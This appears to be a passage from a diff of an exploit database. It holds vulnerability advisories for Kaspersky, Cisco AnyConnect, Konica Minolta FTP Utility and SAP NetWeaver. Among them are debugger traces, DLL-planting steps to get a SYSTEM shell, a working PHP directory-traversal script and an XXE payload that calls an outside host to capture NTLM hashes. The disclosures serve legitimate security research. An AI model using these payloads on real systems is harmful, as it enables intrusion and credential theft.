00 58 FC 90 8D 3F 77 D2 8D 36 8D 00 B8 54 C8 B4
F6 31 44 24 FC 8B 44 24 04 31 44 24 FC 75 A3 90
90 FC 90 FC 89 DB 9B FC 9B FC 83 E9 ED 83 C4 08
And the value being added is from here:
00 00 00 00 82 51 33 4D 00 00 A3 02 02 00 03 00
D8 01 00 80 38 00 00 80 EE 01 00 80 78 00 00 80
03 00 00 00 B8 00 00 80 0E 00 00 00 58 01 00 80
10 00 00 00 98 01 00 80 00 00 00 00 00 00 00 00
The bug is that the index is not verified, resulting in an arbitrary write. This is obviously exploitable for arbitrary code execution.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38286.zip

48
platforms/windows/dos/38288.txt Executable file
View file

@ -0,0 +1,48 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=528
The attached testcase was found by fuzzing packed PE files, I suspect it was packed using "Yoda's protector". This vulnerability is obviously exploitable for remote code execution as NT AUTHORITY\SYSTEM on all systems using Kaspersky Antivirus.
(bb8.ff0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=b5118b71 ebx=0000f8f0 ecx=0515f124 edx=b5118b71 esi=0bfe0e38 edi=0bfe005c
eip=71db9229 esp=0515f0f0 ebp=0515f0f4 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
kavbase_kdl!KLAV_Engine_Create+0x78227:
71db9229 8b4230 mov eax,dword ptr [edx+30h] ds:002b:b5118ba1=????????
What does it do with that value once it's loaded?
0:029> u
kavbase_kdl!KLAV_Engine_Create+0x78227:
71db9229 8b4230 mov eax,dword ptr [edx+30h] <-- dereference bad pointer
71db922c 57 push edi
71db922d 8b38 mov edi,dword ptr [eax] <-- dereference again
71db922f 51 push ecx
71db9230 8b0a mov ecx,dword ptr [edx]
71db9232 8b5730 mov edx,dword ptr [edi+30h] <-- dererence again
71db9235 56 push esi
71db9236 51 push ecx
0:029> u
kavbase_kdl!KLAV_Engine_Create+0x78235:
71db9237 50 push eax
71db9238 ffd2 call edx <-- attacker gets control of execution and parameters
71db923a 83c410 add esp,10h
71db923d 5f pop edi
71db923e 5e pop esi
71db923f 5d pop ebp
71db9240 c3 ret
Where does that pointer come from?
3C 03 6C 9E 8C 7D A5 C5 F9 22 6E F9 71 8B 11 B5 <--- *
B0 4D 5B 5C A8 19 09 FE 36 1A B6 92 3A 92 96 78
95 BD 55 64 76 C5 87 7C 00 C4 C7 36 6E 24 87 9F
5F 12 AB 96 75 ED 11 CC D1 B1 0C 4C B8 88 9A 5D
07 A5 C0 C7 5E 19 04 44 FC 4C 0F 69 20 2E 70 7A
Directly from the input file, so this is obviously exploitable for remote code execution as NT AUTHORITY\SYSTEM.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38288.zip

6
platforms/windows/local/38287.txt Executable file
View file

@ -0,0 +1,6 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=518
A remotely exploitable stack buffer overflow in ThinApp container parsing. Kaspersky Antivirus (I've tested version 15 and 16) and other products using the Kaspersky Engine (such as ZoneAlarm) are affected.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38287.zip

34
platforms/windows/local/38289.txt Executable file
View file

@ -0,0 +1,34 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=460
Cisco AnyConnect Secure Mobility Client v3.1.08009 Elevation of Privilege
Platform: Windows 8.1 Update, Client version 3.1.08009 (tested on 32 bit only)
Class: Elevation of Privilege
Summary:
The fix for CVE-2015-4211 is insufficient which allows a local application to elevate to local system through the CMainThread::launchDownloader command.
Description:
This is directly related to http://tools.cisco.com/security/center/viewAlert.x?alertId=39466. The fix for this issue seemed to be modifying the file verification process to only allow a signed file which also has in its version information the original filename of vpndownloader.exe. This, along with the name change makes it clear you only want to execute the VPN Downloader application. However the code doesnt limit the location of the executable file, so one exploitation vector is DLL planting. The downloader loads a lot of DLLs from the executable directory first, so by copying the vpndownloader.exe file from Program Files to a temporary directory and dropping an appropriately named DLL you can get code execution as SYSTEM. One such DLL is dbghelp.dll which is loaded explicitly by the downloader using LoadLibrary, but there are many more.
Even if by luck the executable wasnt vulnerable to DLL planting theres many other potential issues, for example even though a lock is made on the executable file during signature verification its possible to use symbolic links to exploit this as a race condition and switch the executable file after verification has completed. Theres many other possibilities as well. Id recommend that if youre really only supposed to be executing vpndownloader you only execute it from the secure program files directory which would eliminate this issue.
This was based on work previous done by Kostya Kortchinsky.
Proof of Concept:
The PoC demonstrates the vulnerability and should create a copy of CMD.EXE running at SYSTEM on the current users desktop. Ive provided source for the exploit.exe written in C# 4 and the dbghelp.dll in C++, as well as binaries. It should run on 32 and 64 bit platforms but Ive only tested it on 32 bit.
1) Copy the exploit.exe and dbghelp.dll to a location on a local hard disk which the current user can write to.
2) Execute exploit.exe as the normal user
3) A command prompt should appear running at SYSTEM
Expected Result:
The service rejects the executable request
Observed Result:
The service executes the file from the temporary directory and allows for elevation.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38289.zip

27
platforms/windows/remote/38260.php Executable file
View file

@ -0,0 +1,27 @@
/*
---------------------------------------------------------------------
Konica Minolta FTP Utility directory traversal vulnerability
Url: http://download.konicaminolta.hk/bt/driver/mfpu/ftpu/ftpu_10.zip
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.altervista.org/
Poc: http://shinnai.altervista.org/exploits/SH-0024-20150922.html
---------------------------------------------------------------------
*/
<?php
$local_file = 'boot.ini.txt';
$server_file = '..\..\..\..\..\..\..\..\boot.ini';
$conn_id = ftp_connect($ftp_server);
$login_result = ftp_login($conn_id, "anonymous", "anonymous");
if (ftp_get($conn_id, $local_file, $server_file, FTP_BINARY)) {
echo "Successfully written to $local_file\n";
} else {
echo "There was a problem\n";
}
ftp_close($conn_id);
?>
---------------------------------------------------------------------

56
platforms/xml/webapps/38261.txt Executable file
View file

@ -0,0 +1,56 @@
Title: SAP Netwaver - XML External Entity Injection
Author: Lukasz Miedzinski
GPG: Public key provided in attachment
Date: 29/10/2014
CVE: CVE-2015-7241
Affected software :
===================
SAP Netwear : <7.01
Vendor advisories (only for customers):
===================
External ID : 851975 2014
Title: XML External Entity vulnerability in SAP XML Parser
Security Note: 2098608
Advisory Plan Date: 12/5/2014
Delivery date of fix/Patch Day: 10/2/2014
CVSS Base Score: 5.5
CVSS Base Vector: AV:N/AC:L/AU:S/C:P/I:N/A:P
Description :
=============
XML External Entity Injection vulnerability has been found in the XML
parser in the System
Administration->XML Content and Actions -> Import section.
Vulnerabilities :
*****************
XML External Entity Injection :
======================
Example show how pentester is able to get NTLM hash of application's user.
Content of file (PoC) :
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "file:////Tester.IP/test"> %remote; %param1; ]>
<root/>
When pentester has metasploit smb_capture module run, then application
will contatc him and provide
NTLM hash of user.
Contact :
=========
Lukasz[dot]Miedzinski[at]gmail[dot]com